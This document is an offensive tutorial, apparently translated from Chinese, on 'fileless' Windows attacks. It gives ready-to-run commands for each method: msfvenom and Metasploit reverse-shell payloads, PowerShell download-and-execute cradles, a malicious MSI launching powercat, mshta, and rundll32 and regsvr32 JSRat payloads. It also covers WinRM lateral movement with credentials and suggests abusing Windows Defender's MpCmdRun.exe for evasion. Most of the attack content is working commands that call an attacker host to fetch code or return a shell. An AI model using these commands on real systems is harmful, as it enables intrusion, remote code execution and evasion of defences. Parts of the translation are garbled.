Preface to the article
The so-called "fileless landing attack" refers to an attack method in which malicious program files are not directly dropped into the disk space of the target system. It is often used to evade traditional security detection mechanisms. This article will briefly introduce several types of attacks. Fileless landing attack method is currently more popular.
Common tips
powershell
PowerShell is a cross-platform task automation and configuration management framework that consists of a shell and a scripting language. Unlike most shells that accept and return text, PowerShell is built on the .NET Common Language Runtime (CLR). A fundamental change to accepting and returning .NET objects introduces entirely new automation tools and methods.
PowerShell cmdlets are designed to process objects. Objects are structured information, not just strings that appear on the screen. Command output will always contain additional information that you can use when needed. If you have used text processing tools to process data before, then You'll find that they behave differently when used in PowerShell. In most cases, no text or text processing tools are needed to extract specific information, and parts of the data can be accessed directly using standard PowerShell object syntax.
On the one hand, the powerful functions of Powershell provide convenience for Windows platform developers, but at the same time, it also opens a new path for security researchers. Let’s briefly introduce how to implement fileless landing attacks through PowerShell. The specific steps are as follows :
Step 1: Use Msfvenom to generate an attack payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1
Step 2: Start listening in msf
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.174.129
LHOST => 192.168.174.129
set LPORT 4444
set ExitOnSession false
exploit -j -z
Step 3: Use python to start a simple web server to host shell.exe
python2 -m SimpleHTTPServer 1234
Step 4: Then use powershell to execute the following command on the target host to implement a fileless landing attack.
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:1234/shell.ps1'))"
Step 5: Then receive a request record from the web server
Step 6: Successfully received the rebound shell on the MSF side
msiexec
msiexec.exe belongs to the system process and is part of Windows Installer. It is used to install the Windows Installer installation package (MSI). It is very important for the normal operation of the system. It usually appears when running Microsoft Update to install updates or install some software. It takes up a lot of memory. Large, we can also use it as a medium for file-less implementation. Here are some examples:
Step 1: Use Msfvenom to construct a malicious msi program
msfvenom -p windows/exec CMD="powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.174.129 -p 6666 -e cmd" -f msi > evil.msi
Step 2: Use python to open a simple web server to host the msi payload
Step 3: Use nc listening port on the attacking host
nc -lvp 6666
Step 4: Execute the following command on the target host to execute the payload without files.
msiexec /q /i http://192.168.174.129:1234/evil.msi
Step 5: After that, the request record is successfully received on the web side, and the cmd command interaction is returned on the NC side.
mshta
mshta.exe is a program related to the Microsoft Windows operating system. The full English name is Microsoft HTML Application. It can be translated into Microsoft Hypertext Markup Language application and is used to execute .HTA files. We can build the hta file locally and then remotely through the mshta of the target host. Download and execute to achieve fileless landing attack. The following are the specific steps:
Step 1: Use msf’s exploit/windows/misc/hta_server module to test
Step 2: Execute the following command directly on the target host to implement a fileless landing attack
mshta.exe http://192.168.174.129:8888/OqD8kxY2Z.hta
rundll32
Rundll32.exe, which is "execution of 32-bit DLL file", is a Microsoft binary file. Its main function is to call the dynamic link library through the command line. There is also a Rundll64.exe file in the system, which It means "executing 64-bit DLL files". These two are the favorites of virus software makers, and they are also the most frequently used application media in previous virus analysis reports. The usage of Rundll32.exe is as follows:
Rundll32.exe DLLname,Functionname Arguments
Parameter Description:
DLLname:需要执行的DLL文件名
Functionname:需要执行的DLL文件的具体引出函数
Arguments:函数的具体参数
Below we will introduce how Rundll32.exe is used in fileless landing attacks. The specific methods are as follows (as for process hiding, if you are interested, you can search it yourself): Step 1: Run JSRat to listen to the local port 5678
./JSRat.py -i 192.168.174.129 -p 5678
Step 2: Access client comand to connect to the client and execute the command
Step 3: Copy the above command to the target host and execute it
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.129:5678/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Step 4: Successfully bounce the shell back
right fr32
The Regsvr32 command is used to register COM components. It is a command provided by the Windows system to register controls or uninstall controls to the system. It is run in command line mode. The regsvr32.exe for WinXP and above systems is in the windows\system32 folder. For 2000 systems, the Regsvr32 command is used to register COM components. regsvr32.exe is in the winnt\system32 folder. We can use this command to implement a fileless landing attack. Similar to the above, it is also implemented with the help of JSRat. First, we run JSRat locally to listen to the local 5678 port:
Step 1: Run JSRat to listen to the local port 5678
./JSRat.py -i 192.168.174.129 -p 5678
Step 2: Access client comand to connect to the client and execute the command
Step 3: Copy the above command to the target host and execute it
regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll
Step 4: Successfully bounce the shell back
Knowledge expansion
Here we introduce a fileless landing attack method commonly used in intranets - WinRM fileless landing attack! ! !
WinRM
WinRM is the abbreviation of Windows Remote Managementd. It is a service that allows administrators to perform system management tasks remotely. Communication is performed through http(5985) or https soap(5986). Kerberos and NTLM authentication and basic authentication are supported by default. In intranet penetration, it can not only be used for lateral movement, but also can be used for fileless landing attacks to improve one's anonymity.
test environment
-
Domain host: Windows Server 2012 (192.168.174.2)
-
Domain host: Windows Server 2008 R2 (192.168.174.4)
-
Attack host: Kali Linux (192.168.174.129, intranet penetration is omitted here)
Purpose
Create a backdoor file through the MSF framework in the Kali host, then transfer it to the host in the domain we already control (windows server 2008 R2), and then implement a fileless attack through WinRM in another domain host Windows Server 2012, and finally return a The new Windows Sever 2012 shell with a higher degree of hiding is given to our attack host for in-depth expansion and utilization of the intranet.
Attack steps
Step 1: Create the backdoor file through msfvenom in the attack host
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f exe >shell.exe
Step 2: Start the MSF framework and set up listening
Step 3: Transfer the shell.exe file to the c drive of Windows Server 2008 R2
Step 4: Enable WinRM in Windows Server 2012
winrm quickconfig
Step 5: Then try to connect to Windows Server 2008 R2 through IPC$ in Windows Server 2012
net use \\192.168.174.4\ipc$ "test@1233" /user:testuser
Step 6: Then enable file sharing permissions in Windows Server 2008 R2
Step 7: Execute the following command in Windows Server 2012 to implement fileless landing attack
winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.174.4\c\shell.exe"}
Step 8: Successfully bounce the shell to MSF
Summary at the end of the article
There are various methods and techniques for fileless landing attacks, and they are not limited to the above. Of course, sometimes if you want to really improve your concealment and implement anti-virus technologies, you can combine whitelists and some Windows system application files. Features, such as using the command execution tool "MpCmdRun.exe" that comes with Windows Defender to remotely download malicious files and execute them to achieve the purpose of CS online. More methods and techniques are being explored...